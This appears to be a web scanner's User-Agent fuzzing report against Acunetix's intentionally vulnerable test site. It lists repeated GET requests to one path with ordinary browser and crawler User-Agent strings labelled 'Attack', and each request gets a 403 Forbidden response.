month">></a></b></font></td></tr> </table></font></td></tr><tr><th align="center" abbr="Sunday" scope="col"><font size="2">Sun</font></th><th align="center" abbr="Monday" scope="col"><font size="2">Mon</font></th><th align="center" abbr="Tuesday" scope="col"><font size="2">Tue</font></th><th align="center" abbr="Wednesday" scope="col"><font size="2">Wed</font></th><th align="center" abbr="Thursday" scope="col"><font size="2">Thu</font></th><th align="center" abbr="Friday" scope="col"><font size="2">Fri</font></th><th align="center" abbr="Saturday" scope="col"><font size="2">Sat</font></th></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></font></td></tr><tr><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></font></td><td align="center" width="14%"><font size="2"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></font></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 318 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:19 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Show / hide Request and Response
Request Header - size: 318 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:19 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Show / hide Request and Response
Request Header - size: 318 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:19 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:19 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 396 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:19 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Show / hide Request and Response
Request Header - size: 383 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:21 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 346 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:21 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 340 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:20 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Show / hide Request and Response
Request Header - size: 351 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:20 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 404 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:21 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Show / hide Request and Response
Request Header - size: 409 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:20 GMT Content-Length: 1233
